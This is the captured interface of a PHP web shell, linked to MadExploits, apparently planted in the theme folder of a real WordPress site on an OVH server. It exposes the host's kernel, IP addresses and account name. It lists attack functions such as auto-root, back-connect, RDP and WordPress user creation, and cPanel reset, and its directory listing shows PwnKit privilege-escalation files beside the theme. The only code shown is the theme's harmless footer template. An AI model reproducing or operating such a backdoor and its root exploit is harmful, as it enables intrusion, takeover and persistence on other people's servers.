Linux webm004.cluster106.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue Sep 17 08:14:20 UTC 2024 x86_64
Apache
: 10.106.20.4 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.33
alinaousgg
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
alinaousgg /
www /
wp-content /
themes /
imroz /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
assets
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
languages
[ DIR ]
drwxr-xr-x
layouts
[ DIR ]
drwxr-xr-x
template-parts
[ DIR ]
drwxr-xr-x
woocommerce
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
404.php
1.49
KB
-rw-r--r--
archive-portfolio.php
1.23
KB
-rw-r--r--
archive.php
2.25
KB
-rw-r--r--
comments.php
4.94
KB
-rw-r--r--
footer.php
924
B
-rw-r--r--
functions.php
12.39
KB
-rw-r--r--
functions.php.backup-202511030...
10.67
KB
-rw-r--r--
header.php
1.99
KB
-rw-r--r--
index.php
2.51
KB
-rw-r--r--
page.php
855
B
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
screenshot.png
187.77
KB
-rw-r--r--
search.php
2.25
KB
-rw-r--r--
searchform.php
653
B
-rw-r--r--
sidebar.php
371
B
-rw-r--r--
single-portfolio.php
335
B
-rw-r--r--
single.php
365
B
-rw-r--r--
style-editor.css
41.47
KB
-rw-r--r--
style-rtl.css
11.49
KB
-rw-r--r--
style.css
1.54
KB
-rw-r--r--
wp-debug.log
102
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : footer.php
<?php /** * The template for displaying the footer * * Contains the closing of the #content div and all content after. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package imroz */ ?> </main> <!-- End Page Wrapper --> <?php $imroz_options = Helper::imroz_get_options(); $footer_layout = Helper::imroz_footer_layout(); $footer_area = $footer_layout['footer_area']; $footer_style = $footer_layout['footer_style']; if( "no" !== $footer_area && "0" !== $footer_area ){ get_template_part('template-parts/footer/footer', $footer_style); } ?> <?php if($imroz_options['imroz_scroll_to_top_enable'] != 'no'){ ?> <!-- Start Top To Bottom Area --> <div class="rn-back-top"> <i class="feather-arrow-up"></i> </div> <!-- End Top To Bottom Area --> <?php } ?> </div> <!-- End main page --> <?php wp_footer(); ?> </body> </html>
Close